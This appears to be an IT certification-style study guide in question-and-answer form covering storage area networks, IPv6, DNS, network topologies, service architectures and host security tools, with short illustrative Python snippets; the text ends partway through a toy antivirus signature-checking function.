The Three Most Widely Used Storage Consolidation Architectures
Determine the three most widely used storage consolidation architectures.
The three most widely used storage consolidation architectures are:
Show answer and Breakdown
Answer:
Network-attached storage (NAS): the hard drive that stores the data has its own network address. Files can be stored and accessed quickly because processor resources are not shared with other computers.
Redundant array of independent disks (RAID): the data is kept on multiple disks, and the array appears as a single logical hard drive. This supports balanced overlapping of input/output (I/O) operations and provides fault tolerance, minimizing downtime and the risk of catastrophic data loss.
Storage area network (SAN): the most advanced architecture, usually built on Fibre Channel technology. SANs are known for high throughput and for providing centralized storage to multiple subscribers over an extended geographic area. SANs support data sharing and data migration among servers.
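To see why a RAID array survives a failed disk, here is a minimal sketch (Python 3, standard library only) of the XOR parity scheme used by RAID 5: any one lost block can be rebuilt by XOR-ing the surviving blocks with the parity block.

    def xor_blocks(blocks):
        # XOR a list of equal-length byte blocks together.
        out = bytearray(len(blocks[0]))
        for block in blocks:
            for i, byte in enumerate(block):
                out[i] ^= byte
        return bytes(out)

    data = [b"DISK0___", b"DISK1___", b"DISK2___"]
    parity = xor_blocks(data)              # written to the parity disk

    lost = data.pop(1)                     # simulate disk 1 failing
    rebuilt = xor_blocks(data + [parity])  # XOR survivors with parity
    assert rebuilt == lost
    print("rebuilt:", rebuilt)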
What is a Storage Area Network (SAN)?
Be able to define and then describe a Storage Area Network (SAN).
The definition of a Storage Area Network (SAN): Storage Area Network (SAN) is a high-speed sub-network of shared storage devices. A storage device is a machine that’s made up of a disk or disks to store data. Let's describe this technology a little further:
Show answer and Breakdown
Answer:
A Storage Area Network (SAN) is an architecture that connects remote computer data storage devices (such as disk arrays, tape libraries, and optical jukeboxes) to servers in such a way that the devices appear to the operating system as locally attached. A SAN usually has its own network of storage devices that are not accessible or alterable through the regular network by regular devices. The cost and complexity of SANs dropped in the late 2000s, offering much wider adoption across both enterprise and small to medium-sized business environments.
Storage Area Network Infrastructure – Fibre Channel Fabric Topology
Describe a SAN’s network infrastructure, which is a Fibre Channel Fabric Topology.
SAN Infrastructure: Storage Area Network (SAN) widely uses a Fibre Channel fabric topology. This infrastructure is specifically designed to handle…
Show answer and Breakdown
Answer:
storage communications and networks. It provides faster, easier, and more reliable access than the higher-level protocols used in NAS. A fabric is similar in concept to a network segment in a local area network. A typical Fibre Channel SAN fabric consists of a number of Fibre Channel switches.
The Primary Benefits of Using a Storage Area Network
Describe the primary benefits of SANs.
Benefits of using SANs: A SAN is a dedicated network that offers access to consolidated, block-level data storage, providing these benefits:
Show answer and Breakdown
Answer:
Storage consolidation reduces costs
Storage or servers can be added without interruption
Data is backed up and restored quickly
High-performance interface
Supports server clusters of eight nodes
Disaster tolerance
Reduced cost of ownership
The Three Levels of Threats in Storage Area Networks
What are the three levels of threats faced by Storage Area Networks (SANs)?
3 levels of threats faced by the SAN: A storage area network transfers and stores crucial data, which often makes it an attractive target. The three different levels of threats are as follows:
Show answer and Breakdown
Answer:
Level one: threats that are unintentional and may result in downtime and loss of revenue. Administrators can take measures to prevent these threats.
Level two: threats that are simple malicious attacks using existing equipment.
Level three: threats that are serious, large-scale attacks which are difficult to prevent, usually executed by skilled attackers using specialized equipment.
Top Security Concepts of Storage Area Networks
What three concepts make up the security considerations of SANs?
Concepts included in SAN security: A storage area network (SAN) is a dedicated network that provides access to consolidated, block-level data storage. The security of a SAN rests entirely on user authorization. SAN security involves these ideas:
Show answer and Breakdown
Answer:
Host adapter-based security: Security measures for the Fibre Channel host bus adapter can be applied at the driver level.
Switch zoning: Switch zoning is used in a switch-based Fibre Channel SAN. Technically, it means masking the nodes connected to the switch so that communication is restricted to members of the same zone.
Storage-controller mapping: by mapping host adapters against LUNs in the storage system, some storage subsystems accomplish LUN masking in their storage controllers.
Performance Factors of Storage Area Networks
What are the prime performance benefits of Storage Area Networks (SANs)?
Performance rationale for using a SAN: A SAN offers a high-performance interface (over 100 MB/s), and data is saved and restored quickly. It also offers disaster tolerance. These are the top performance reasons for using a SAN:
Show answer and Breakdown
Answer:
Better disk utilization
Fast and extensive disaster recovery
Better availability for applications
Faster backup of large amounts of data
What is a Virtual Storage Area Network (VSAN)?
Be familiar with the definition of a Virtual Storage Area Network (VSAN). Also deeply describe the concept.
VSAN stands for Virtual Storage Area Network. A VSAN is a section of a storage area network (SAN) that has been divided into…
Show answer and Breakdown
Answer:
logical sections, also called partitions. A series of ports forms a group of connected Fibre Channel switches that together produce a virtual fabric. VSANs were developed by Cisco, modeled on the Virtual Local Area Network (VLAN) concept in Ethernet networking. A VSAN supports various high-level protocols such as FCP, FCIP, FICON, and iSCSI.
What is iSCSI (Internet Small Computer System Interface)?
What is the definition of iSCSI (Internet Small Computer System Interface)? Also deeply describe the concept.
iSCSI (Internet Small Computer System Interface) is an IP-based storage networking standard for linking data storage facilities. iSCSI transmits data over…
Show answer and Breakdown
Answer:
intranets and manages storage over long distances by carrying SCSI commands over IP networks. iSCSI can send data over local area networks, wide area networks, or the Internet, and can provide location-independent data storage and retrieval. Users can send SCSI commands to SCSI storage devices on remote servers. It is a commonly used storage area network standard that allows businesses to consolidate storage into data center storage arrays while providing hosts with the appearance of locally attached disks. In contrast to Fibre Channel, which requires specialized cabling, iSCSI can run over long distances using existing network infrastructure.
What is Fibre Channel over Ethernet (FCoE)?
Define and then describe the concept of Fibre Channel over Ethernet (FCoE).
Fibre Channel over Ethernet (FCoE) is an encapsulation of Fibre Channel frames over Ethernet networks. It allows Fibre Channel to…
Show answer and Breakdown
Answer:
use 10 Gigabit Ethernet networks while preserving the Fibre Channel protocol. FCoE maps Fibre Channel over selected full-duplex IEEE 802.3 networks, providing I/O consolidation over Ethernet and reducing network complexity in the datacenter. The FCoE protocol specification replaces the FC0 and FC1 layers of the Fibre Channel stack with Ethernet.
What is Logical Unit Number Masking (LUN Masking)?
Define and then describe the concept of Logical Unit Number Masking (LUN Masking).
Definition of LUN Masking: Logical Unit Number Masking or LUN masking is an authorization process that makes…
Show answer and Breakdown
Answer:
a logical unit number accessible to some hosts and inaccessible to others. LUN masking is applied primarily at the HBA (host bus adapter) level; some storage controllers also support LUN masking. This is significant because Windows-based servers attempt to write volume labels to all available logical unit numbers.
What is Host Bus Adapter (HBA) Allocation?
Define and describe Host Bus Adapter (HBA) allocation.
The Definition of HBA Allocation: HBA or Host Bus Adapter is an I/O adapter that links the…
Show answer and Breakdown
Answer:
host computer bus and the Fibre Channel loop, and manages the transfer of data between them. To optimize host processor performance, the host bus adapter performs many low-level interface functions automatically, with little or no processor involvement.
What is a Distributed File System (DFS)?
Define and deeply describe Distributed File System (DFS).
Distributed File System (DFS) is a group of client and server services in which an organization using Microsoft Windows servers can arrange many distributed SMB file shares into a distributed file system. DFS supports location transparency and redundancy to enhance data accessibility in the event of system failure or heavy load by allowing shares in several different locations to be logically grouped under one folder, or DFS root. Click for more:
Show answer and Breakdown
Answer:
Distributed File System (DFS) allows users to retrieve files located on a remote host as though they were working on the local host computer. This system allows several users on several machines to share files and storage resources. The client nodes do not have direct access to the underlying block storage; they interact over the network using a protocol. Distributed file systems may provide facilities for transparent replication and fault tolerance, meaning that when a small number of nodes in the file system go offline, the system keeps running with no loss of data.
What is Secure Storage Management – Multipath?
Define and describe the secure storage management technique of multipath I/O.
In storage networking, multipath I/O is a fault-tolerance and performance technique in which data can travel between a server and its storage devices over…
Show answer and Breakdown
Answer:
two or more physical paths, using redundant components such as host bus adapters, switches, and storage controllers. If one path fails, I/O fails over to a surviving path, and multipathing software can also balance load across the available paths to improve performance.
What is Secure Storage Management – Snapshots?
Define and describe the secure storage management technique of snapshots.
Snapshots are files that hold the configuration and data in a virtualized machine. The Hyper-V Manager Console allows…
Show answer and Breakdown
Answer:
the facility to take a snapshot of a virtual machine running under Hyper-V. The benefit of a snapshot is that it allows rolling an operating system back to the instant the snapshot was taken. In cases of malfunction or corruption of a virtual machine, snapshots are useful tools in the recovery process.
What is Secure Storage Management – Data De-duplication?
Define and describe the secure storage management technique of data de-duplication.
Data de-duplication offers its own benefits. Reduced storage space requirements will…
Show answer and Breakdown
Answer:
save money on disk expenditures. Efficient use of disk space also allows for longer disk retention periods, which improves recovery time objectives (RTO) over time and reduces the need for tape backups. Data de-duplication also reduces the amount of data that must be transmitted across a WAN for remote backups, replication, and disaster recovery.
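A minimal sketch of the idea behind hash-based de-duplication (fixed-size chunks for simplicity; real products typically use variable-size chunking and far more robust metadata handling):

    import hashlib

    CHUNK = 4096
    store = {}        # chunk hash -> chunk bytes, stored once

    def dedupe_write(data: bytes):
        # Split data into chunks and store each unique chunk only once;
        # return the ordered list of hashes needed to rebuild the data.
        recipe = []
        for i in range(0, len(data), CHUNK):
            chunk = data[i:i + CHUNK]
            digest = hashlib.sha256(chunk).hexdigest()
            store.setdefault(digest, chunk)
            recipe.append(digest)
        return recipe

    def dedupe_read(recipe):
        return b"".join(store[d] for d in recipe)

    data = b"A" * 8192 + b"B" * 4096 + b"A" * 4096  # repeated content
    recipe = dedupe_write(data)
    print(len(recipe), "chunks referenced,", len(store), "unique chunks stored")  # 4 and 2
    assert dedupe_read(recipe) == data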
What is Remote Access?
Describe the concept of remote access network design.
Remote access: A network’s secure remote access has become a critical component in a working enterprise. Remote access assists the process of…
Show answer and Breakdown
Answer:
accessing a computer or a network from a remote location. In many businesses, personnel in branch offices, telecommuters, and traveling employees rely on remote access to connect to their organization's network. Home users connect to the Internet through remote access to an Internet service provider (ISP).
Network Design and the Placement of Security Devices
What role does placement of security devices play in advanced network design?
Placement of security devices and network design: Given the ongoing and increasing security threats, the need for solid security systems is a top priority for owners and operators of various commercial buildings and facilities. A vital step in establishing a quality security system is…
Show answer and Breakdown
Answer:
its preliminary design, done after the security risk assessment. In contrast to the prescriptive code requirements applied to fire protection systems, security systems do not come with prescriptive codes in place, and specific requirements for these systems are by and large found in manufacturers' installation recommendations. Rather than the risk assessment itself, this material focuses on the complexities involved in producing quality design documentation for a security system, primarily drawings, that clearly conveys the system design and operational goals to the owner and the installing contractor.
The Role of SCADA Systems in Network Design
How do SCADA systems play a part in network design?
SCADA systems include hardware and software components. The hardware gathers and feeds data into a computer system…
Show answer and Breakdown
Answer:
that has SCADA software installed. The computer then processes this data and presents it in a timely manner. The system also maintains a log of all events in a file stored on a hard disk, or forwards them to a printer, and it sounds alarms to alert operators when hazardous conditions develop.
The Role of Voice Over IP (VOIP) in Network Design
What is Voice Over IP and what aspects should be considered in network design.
VoIP (Voice over IP) is an IP telephony term for a group of facilities that control the delivery of voice data over the Internet. VoIP entails forwarding…
Show answer and Breakdown
Answer:
voice information in digital form in discrete packets rather than through the traditional circuit-committed protocols of the public switched telephone network (PSTN). A significant benefit of VoIP and Internet telephony is that it bypasses the tolls charged by standard telephone service.
What is IPv6 and What Role Does it Play in Network Design?
Deeply describe IPv6 and the role it plays in modern advanced network design.
IPv6 is the abbreviation for “Internet Protocol Version 6”. It is the upgraded version of, and successor to, IPv4, the first version of the protocol deployed on the Internet and still in widespread use. It is an Internet Layer protocol for packet-switched internetworks. The predominant motive for the redesign of the Internet Protocol was the projected exhaustion of IPv4 addresses. IPv6 was specified in December 1998 by the Internet Engineering Task Force (IETF) with the publication of an Internet standard specification, RFC 2460. IPv6 also introduces new features that simplify aspects of address assignment (stateless address auto-configuration) and network renumbering (prefix and router announcements) when…
Show answer and Breakdown
Answer:
switching Internet connectivity providers. The IPv6 subnet size has been standardized by fixing the size of the host identifier portion of an address at 64 bits, permitting an automated mechanism for forming the host identifier from Link Layer media addressing information (the MAC address).

Attributes and differences from IPv4: IPv6 is a conservative extension of IPv4. Most transport and application-layer protocols need little or no modification to operate over IPv6; exceptions are application protocols that embed internet-layer addresses, such as FTP or NTPv3. An IPv6 subnet holds 2^64 addresses (a 64-bit host identifier), the square of the size of the entire IPv4 Internet (2^32 addresses). Address space utilization rates will likely be low in IPv6, but network management and routing will be more efficient because of the design decisions of large subnet space and hierarchical route aggregation.
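The subnet arithmetic is easy to verify with Python's standard ipaddress module:

    import ipaddress

    v4 = ipaddress.ip_network("192.0.2.0/24")
    v6 = ipaddress.ip_network("2001:db8::/64")

    print(v4.num_addresses)            # 256
    print(v6.num_addresses)            # 18446744073709551616
    print(v6.num_addresses == 2**64)   # True: one /64 dwarfs the entire IPv4 space (2**32)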
What is Stateless Address Auto-Configuration?
Describe stateless address auto-configuration and the role it plays in network design.
Stateless address auto-configuration: IPv6 hosts can configure themselves automatically when connected to a routed IPv6 network using ICMPv6 router discovery messages. Once connected to the network, a host sends…
Show answer and Breakdown
Answer:
a link-local multicast router solicitation request for its configuration parameters; suitably configured routers respond with a router advertisement packet containing network-layer configuration parameters. If stateless auto-configuration is unsuitable, hosts can use the Dynamic Host Configuration Protocol for IPv6 (DHCPv6) or be configured with fixed settings. Routers have specialized requirements for address configuration, since they are often the source of auto-configuration information such as router and prefix advertisements; stateless configuration of routers is accomplished with a special router renumbering protocol.
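One well-known ingredient of stateless auto-configuration is deriving the 64-bit interface identifier from the MAC address (modified EUI-64): insert ff:fe between the two halves of the MAC and flip the universal/local bit. A short sketch in Python:

    def eui64_interface_id(mac: str) -> str:
        # Derive a modified EUI-64 interface identifier from a MAC address.
        octets = [int(part, 16) for part in mac.split(":")]
        octets[0] ^= 0x02            # flip the universal/local bit
        octets[3:3] = [0xFF, 0xFE]   # insert ff:fe between OUI and NIC halves
        groups = [f"{octets[i] << 8 | octets[i + 1]:x}" for i in range(0, 8, 2)]
        return ":".join(groups)

    print(eui64_interface_id("00:1a:2b:3c:4d:5e"))  # 21a:2bff:fe3c:4d5e
    # Prefixed with fe80:: this yields the link-local address fe80::21a:2bff:fe3c:4d5e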
What is Multicast on IPv6?
Describe the role of Multicast in IPv6.
Multicast: multicast is the mechanism by which a single packet is sent to multiple destinations. It is part of the base specification in IPv6, as opposed to IPv4, where it is optional (although usually implemented). IPv6 does not…
Show answer and Breakdown
Answer:
implement broadcast, the capability of transmitting a packet to all hosts on the attached link. The same result can be achieved by sending a packet to the link-local all-hosts multicast group (ff02::1). As a consequence, the highest address in a subnet, which serves as the broadcast address for that subnet in IPv4, is treated as a normal address in IPv6.
The Role of Internet Protocol Security (IPsec) in Network Design
Describe the role of IPSec in network design.
Internet Protocol Security (IPsec), the protocol suite for IP encryption and authentication, forms an essential component of the…
Show answer and Breakdown
Answer:
base protocol suite in IPv6. IPsec support is mandatory in IPv6, whereas in IPv4 it is optional (though commonly implemented). IPsec, however, is not yet widely used except for securing traffic between IPv6 Border Gateway Protocol routers.
Complex network security solutions for data flow
Things to consider regarding complex network security solutions for data flow.
Preserving a secure network environment with existing network security technologies is a significant challenge, for several reasons. Increasingly advanced and fast-evolving cyber threats, motivated by profit rather than notoriety, can circumvent standalone security technologies. The costs and complexities involved with…
Show answer and Breakdown
Answer:
controlling an increasingly distributed network with seemingly no limits increase the pressure on overloaded resources. The performance and processing capability required to provide complete content-level protection is difficult to achieve without purpose-built hardware. Most standalone network security systems consist of single-purpose security software running on PC-based hardware platforms, offering only basic network security operations. These standalone products don't offer the extensive security, network deployment flexibility, and advanced functionality essential to block complex network-level and content-level IT security threats.
Considerations on secure data flows to meet changing business needs
Considerations on secure data flows to meet changing business needs.
Evolving business models and the rapid increase in global data flows have prompted organizations worldwide to take stock of how data moves through their systems. Standard security technologies such as…
Show answer and Breakdown
Answer:
access control and encryption do not directly enforce information flow policies. A newer approach is the use of programming-language techniques for specifying and enforcing information flow policies.
What is the Domain Name System (DNS)?
Define and describe Domain Name System (DNS).
The Domain Name System (DNS) is an essential component of the Internet. By and large, users don't have a working knowledge of how DNS functions, but they use it every time they are…
Show answer and Breakdown
Answer:
on the Internet. DNS is the mechanism that translates a name such as www.mywebsite.com to an IP address such as 192.168.1.200, and vice versa. It is much simpler to remember a name such as www.mywebsite.com than an IP address. Electronic mail, web browsing, and other Internet-based applications depend on DNS. Securing your DNS information means securing DNS queries, zone transfers, and dynamic updates.
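Both directions of the translation can be demonstrated with Python's standard socket module (the hostname below is a documentation placeholder):

    import socket

    # Forward lookup: name -> address
    addr = socket.gethostbyname("www.example.com")
    print(addr)

    # Reverse lookup: address -> name (succeeds only if a PTR record exists)
    try:
        name, aliases, addresses = socket.gethostbyaddr(addr)
        print(name)
    except socket.herror:
        print("no PTR record for", addr)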
What are Directory Services?
Describe directory services and the role they play in network design.
A directory service is the software application that stores, arranges, and offers access to information in a directory. In software engineering, a directory is a…
Show answer and Breakdown
Answer:
map between names and values; it provides a list of values that can be looked up by name. Just as a word in a dictionary can have more than one definition, a name in a directory may be correlated with multiple, different pieces of information; and just as words have various parts of speech and varied definitions, a name in a directory may have many different types of data.
Network Design Consideration, Building Layouts and Facilities Management
Things to consider when designing a network, regarding building layouts and facilities management.
While designing the physical structure of a network, the first task will be to plan for the site and its topology. A site is a group of one or more interconnected (usually a local area network) TCP/IP subnets. The network between the subnets must be…
Show answer and Breakdown
Answer:
highly functional and fast (512 Kbps and higher). Although sites are defined on the basis of location, they can extend over multiple locations. A site structure is defined by the physical environment, whereas a domain is the logical environment of the network. A site can contain one or several domains, and a domain can contain one or several sites. Sites are not included in the Active Directory namespace; although a user browsing the logical namespace won't use a site's name, the site name is part of DNS records, so sites are required to have valid DNS names. Sites are used to control logon traffic, replication traffic, the Distributed File System (DFS), and the File Replication Service (FRS).
Network Topology – Bus, Ring, Star, Mesh and Wireless
A deeper look into network topology types, bus, ring, star, mesh and wireless.
Network topology is the pattern in which the network medium is linked to the computers and other networking components. The major topologies associated with local area networking are:
- Bus topology: a type of physical network design where computers in the network are connected through a single coaxial cable known as a bus.
- Ring topology: a type of physical network design where all computers in the network are connected in a closed loop. Each computer or device in a Ring topology network functions as a repeater. It sends data by passing a token around the network in order to avoid the collision of data between two computers that want to transmit messages simultaneously. If a token is free, the computer on standby to send data obtains it, attaches the data and destination address to the token, and sends it. When the token reaches its destination computer, the data is copied. The token is then sent back to the originator. The originator sees that the message has been copied and received and removes the message from the token, rendering the token free and available to be used by the other computers in the network to send data. In this topology, if one computer fails, the entire network goes down.
Click to view the others:
Show answer and Breakdown
Answer:
- Star topology: a type of physical network design where each computer in the network is connected to a central device, or hub, through an unshielded twisted-pair (UTP) wire. Signals from the sending computer go to the hub and are then distributed to all the computers in the network. Since each workstation has its own connection to the hub, it is easy to troubleshoot. This is the most common topology used for networks.
- Mesh topology: a type of physical network design where all devices in a network are connected to each other with many redundant connections. It provides many paths for data traveling on the network to reach its destination, and thus offers redundancy. It uses full-mesh and partial-mesh techniques to connect devices.
- Wireless topology: a type of physical network design that does not use cable as the network medium. A wireless LAN consists of a transceiver unit, called a wireless access point, that is connected to servers or directly to the network and other devices using a standard cabled network protocol, such as Ethernet or Token Ring. In the wireless network, client computers communicate with the network-attached transceivers by using their own transceivers. The most common wireless media are infrared light and radio waves.
Multi-tier networking data design considerations
A deep look into multi-tier network architecture design.
Multi-tier architecture is often labeled n-tier architecture. It is a client-server architecture in which the presentation, the application processing, and the data management are logically separate processes. For example, an application that uses…
Show answer and Breakdown
Answer:
middleware to process data requests between a user and a database employs multi-tier architecture. The most common form of multi-tier architecture is the three-tier architecture. N-tier application architecture provides a model for developers to create flexible and reusable applications. By splitting an application into tiers, developers can modify or add one layer at a time rather than rewrite the entire application. There should be a presentation tier, a business or data access tier, and a data tier. The terms layer and tier are often used interchangeably, although there is a noted difference: a layer is a logical structuring mechanism for the elements that make up the software solution, while a tier is a physical structuring mechanism for the system infrastructure.
Trends and considerations in network components
A brief summary of fundamental network components.
The fundamental components of a network have (for the most part) remained unchanged in the last few years. NICs, switches, cabling, routers, and storage have become…
Show answer and Breakdown
Answer:
more affordable while supporting increased bandwidth and easier management. Selecting basic network components is a fairly straightforward process for solution providers working with SMB clients. Switches and devices that use Power over Ethernet (PoE) technology are gaining acceptance, and there is a range of unique storage options available for the client, such as inexpensive NAS and SAN systems.
What are Deployment Diagrams and What is their Purpose?
Define Deployment Diagrams and describe their purpose in network planning.
Deployment diagrams help in visualizing the topology of the physical components of a system on which the software components run, so deployment diagrams are used to specify the static deployment view of a system. Deployment diagrams are made up of nodes and their relationships. The name Deployment means…
Show answer and Breakdown
Answer:
the purpose of the diagram itself: deployment diagrams are used to specify the hardware components on which software components are deployed. Component diagrams and deployment diagrams are closely related: component diagrams describe the components, while deployment diagrams show how they are deployed on hardware. UML is mainly concerned with the software artifacts of a system, but these two diagrams address software components and hardware components respectively. While most UML diagrams are used to address logical components, deployment diagrams focus on the hardware topology of a system. Deployment diagrams are the tools of system engineers, and are designed to:
Visualize the hardware topology of a system.
Describe the hardware components used to deploy software components.
Describe runtime processing nodes.
Transport Layer Security and its Advantages Over SSL
What is Transport Layer Security (TLS) and what advantage does it have over Secure Socket Layer (SSL)?
Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide security for communications over networks. TLS and SSL encrypt network connections end-to-end at the Transport Layer. Many versions of these protocols are used in applications such as email and instant messaging. A prime benefit of the TLS protocol is that…
Show answer and Breakdown
Answer:
client/server applications can communicate across a network in a way designed to prevent eavesdropping and tampering. TLS provides endpoint authentication and communications privacy over the Internet using cryptography. TLS also supports RSA security with 1024- and 2048-bit key strengths.
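A minimal TLS client sketch using Python's standard ssl module; the certificate and hostname verification performed by the default context is what supplies the endpoint authentication described above (the hostname is a documentation placeholder):

    import socket
    import ssl

    context = ssl.create_default_context()  # verifies certificates and hostnames by default

    with socket.create_connection(("www.example.com", 443)) as sock:
        with context.wrap_socket(sock, server_hostname="www.example.com") as tls:
            print(tls.version())                 # e.g. 'TLSv1.3'
            print(tls.getpeercert()["subject"])  # the server certificate's subject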
What are Static Route Settings and Why are they Secure?
Determine why the use of static routes is a security best practice for router settings.
Static routes: One of the most secure routing solutions for your router is the use of static routes to enable Layer 3 connectivity. Static routes are protected from route-spoofing attacks because the router does not depend on routing data transmitted from other routers: the information is configured locally on your perimeter router. Static routes are commonly used in the following situations:
Show answer and Breakdown
Answer:
You have a small number of destinations to configure.
Only one or two paths exist to each destination.
With static routes, the following is true:
A default route is used on the perimeter router to reach external resources.
Specific internal routes are used to reach internal resources.
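The forwarding decision against a static table is just a longest-prefix match, which can be sketched with Python's standard ipaddress module (the networks and next-hop names are illustrative placeholders):

    import ipaddress

    # A static table: specific internal routes plus a default route.
    routes = [
        (ipaddress.ip_network("10.1.0.0/16"), "internal-router"),
        (ipaddress.ip_network("10.1.5.0/24"), "dmz-router"),
        (ipaddress.ip_network("0.0.0.0/0"),   "perimeter-default"),
    ]

    def next_hop(destination: str) -> str:
        addr = ipaddress.ip_address(destination)
        matches = [(net, hop) for net, hop in routes if addr in net]
        return max(matches, key=lambda m: m[0].prefixlen)[1]  # longest prefix wins

    print(next_hop("10.1.5.20"))    # dmz-router
    print(next_hop("203.0.113.8"))  # perimeter-default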
What is the Enterprise Service Bus (ESB) Software Architecture Model?
Define and describe Enterprise Service Bus (ESB).
An enterprise service bus (ESB) is a software architecture model used for designing and implementing communication between mutually interacting…
Show answer and Breakdown
Answer:
software applications in a service-oriented architecture. As a model for distributed computing, it is a specialized form of the general client-server software architecture model, and it promotes strictly asynchronous, message-oriented interaction between applications. Its main use is in the enterprise application integration of heterogeneous and complex landscapes. The ESB concept combines the bus concept found in computer hardware architecture with the modular and concurrent design of high-performance computer operating systems. The motivation was to establish a standard, structured, general-purpose concept for describing the implementation of loosely coupled software components (services) that are expected to be independently deployed, running, heterogeneous, and disparate within a network. ESB is also the standard implementation pattern for service-oriented architecture.
What are the Main Functions of an Enterprise Service Bus (ESB)?
Determine the main functions of an Enterprise Service Bus (ESB).
Duties of an ESB: An ESB transports the design concept of modern operating systems to networks of disparate and independent computers. Like concurrent operating systems, an ESB supplies commonly needed commodity services in addition to the adoption, translation, and routing of client requests to the appropriate answering services. The main functions of an ESB are:
Show answer and Breakdown
Answer:
Monitor and control routing of message exchange between services. Resolve contention between communicating service components. Control deployment and versioning of services.
Using ESB with Atomic Services
The relationship of an ESB to atomic services.
ESB and Atomic Services: An ESB offers an abstraction layer on top of an implementation of an…
Show answer and Breakdown
Answer:
enterprise messaging system. In order for an integration broker to be seen as an authentic ESB, its base functions would need to be split up into their basic and atomic parts. The atomic elements would then be capable of being individually applied across the bus while also working together when needed.
What is Service-Oriented Architecture?
Define and describe service-oriented architecture (SOA).
In computing, a service-oriented architecture (SOA) is a flexible group of design principles applied in the systems development and integration phases. A deployed SOA-based architecture will support a loosely integrated series of services that can be used in several business domains. Service-Oriented Architecture also guides consumers of its services to other…
Show answer and Breakdown
Answer:
available SOA-based services. For example, several separate departments within a company may develop and use SOA services in different implementation languages; their clients will benefit from a well understood, comprehensive interface to access them. XML is widely used for interfacing with SOA services, though not required. SOA specifies how to integrate widely dissimilar applications in the web space via multiple implementation platforms. Rather than defining an API, SOA specifies the interface in terms of protocols and functionality. An endpoint is the entry point for such an SOA implementation.
What is Security Information and Event Management (SIEM)?
Define and describe Security Information and Event Management (SIEM).
Security Information and Event Management solutions are an integration of the formerly separate product categories of SIM (security information management) and SEM (security event management). SIEM technology offers real-time…
Show answer and Breakdown
Answer:
examination of security alerts produced by network hardware and applications. SIEM solutions are available as software, appliances or managed services, and are also used to record security data and produce reports for compliance purposes. The acronyms SEM, SIM, and SIEM have been used interchangeably, even with the known differences in meaning and product functionality. The aspect of security management that focuses on real-time monitoring, correlation of events, notifications and console views is known as Security Event Management (SEM). The second aspect provides ongoing storage, analysis, and reporting of log data and is known as Security Information Management (SIM).
What is Database Activity Monitoring (DAM)?
Define and describe Database Activity Monitoring (DAM).
Database activity monitoring (DAM) is a database security method used for overseeing and analyzing…
Show answer and Breakdown
Answer:
database activity that functions separately from the database management system (DBMS) and does not depend on any form of native (DBMS-resident) auditing or native logs such as trace or transaction logs. DAM is typically performed on an ongoing basis and in real-time.
What is Database Activity Monitoring and Prevention (DAMP)?
Define and describe Database Activity Monitoring and Prevention (DAMP).
Database activity monitoring and prevention (DAMP) is an extension to DAM that, in addition to monitoring and alerting, also blocks unauthorized activities. DAMP helps businesses…
Show answer and Breakdown
Answer:
address regulatory compliance mandates like the Payment Card Industry Data Security Standard (PCI DSS), the Health Insurance Portability and Accountability Act (HIPAA), the Sarbanes-Oxley Act (SOX), U.S. government regulations, and EU regulations. DAMP is also an important mechanism for safeguarding sensitive databases from external attacks by cybercriminals. According to Gartner, "DAMP provides privileged user and application access monitoring that is independent of native database logging and audit functions. It can function as a compensating control for privileged user separation-of-duties issues by overseeing administrator activity. The technology also enhances database security by scanning for anomalous database read and update activity from the application layer. Database event aggregation, correlation, and reporting provide a database audit capability without having to activate native database audit functions."
What are Service Enabled (SE) Applications?
Define Service Enabled (SE) applications.
Service-Enabled (SE) applications are built from the bottom up on…
Show answer and Breakdown
Answer:
Simple Services, which allow for highly flexible solutions capable of solving today's integration challenges and provide the flexibility to evolve as an organization's or user's needs evolve.
What is Web Service Security (WS-Security)?
Define Web Service Security (WS-Security).
Web Service Security (WS-Security) is a security service that is used for enabling message-level security for Web services. To activate this service, the user must…
Show answer and Breakdown
Answer:
verify the related WSSE policy information is available to the Managed Servers. The SOAP messages that are transmitted between two or more Web services can be protected by WS-Security using security tokens, digital signatures, and encryption.
The Role of Security Controls for Hosts
Determine the role that Security Controls play for hosts.
Security controls are protective mechanisms or counteragents to prevent, counteract, or reduce security risks. Security control monitoring requires…
Show answer and Breakdown
Answer:
discerning which security controls will be monitored. FIPS 199 can help determine which controls to monitor: it assists with determining the security categories of information and information systems, and also highlights the elements that are most vital to the organization. After establishing security controls, the next task is evaluating whether control functions are performing at the level required by the system security plan; this is usually handled by the information system owner. Security controls can be evaluated through audits, self-assessments, and other review methods. NIST Special Publication 800-53A provides a standard approach for the assessment of security controls.
What are Host-Based Firewalls?
Define host-based firewalls.
A host-based application firewall can monitor any application input, output, and/or system service calls made from, to, or by an application. This is done by…
Show answer and Breakdown
Answer:
analyzing data run through system calls as an alternative to, or in addition to, a network stack. A host-based application firewall can only protect the applications running on the same host. The Mac OS X application firewall is an example of a host-based application firewall that mediates system service calls. Host-based application firewalls may also provide network-based application firewalling.
What is the Trusted Operating System (TOS)?
Define and describe Trusted Operating System (TOS).
Trusted Operating System (TOS) refers to an operating system that affords support for multifaceted security and evidence of correctness to satisfy…
Show answer and Breakdown
Answer:
a specific set of government requirements. The Common Criteria, together with the Security Functional Requirements (SFRs) for the Labeled Security Protection Profile (LSPP) and Mandatory Access Control (MAC), is the most common set of criteria for trusted operating system design. The Common Criteria is the result of a dedicated, multi-year endeavor by the governments of the U.S., Canada, the United Kingdom, France, Germany, the Netherlands, and other countries to develop harmonized security criteria for IT products.
Two Techniques for Endpoint / Antivirus Security Software
What are the two techniques for endpoint security / antivirus software?
Endpoint security software / anti-virus software is a common tool that scans for and removes known viruses after the computer downloads or executes a program. To identify a virus, there are two common techniques employed by anti-virus software:
Show answer and Breakdown
Answer:
The first, and most common, technique of virus detection is referencing a list of virus signature definitions. The software inspects the contents of the computer's memory (RAM and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives), and cross-references those files against a database of known virus "signatures". The drawback: users are only shielded from viruses that pre-date their last virus definition update. The second technique is employing a heuristic algorithm to locate viruses based on common behaviors. A heuristic algorithm can discover viruses that antivirus security companies have yet to develop a signature for. Some anti-virus programs can inspect files as they are opened, and emails as they are sent and received, in a similar manner; this practice is known as "on-access" scanning.
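As a simplified illustration of the signature technique, the Python sketch below checks files against a set of known-bad SHA-256 hashes. Real scanners match byte-level patterns and heuristics rather than whole-file hashes; the hash shown is the commonly cited digest of the harmless EICAR test file, included here only for demonstration.

    import hashlib
    from pathlib import Path

    # Toy "signature database": digests of known-malicious files.
    KNOWN_BAD_SHA256 = {
        "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",  # EICAR test file
    }

    def matches_signature(path: Path) -> bool:
        # Hash the file contents and look the digest up in the signature set.
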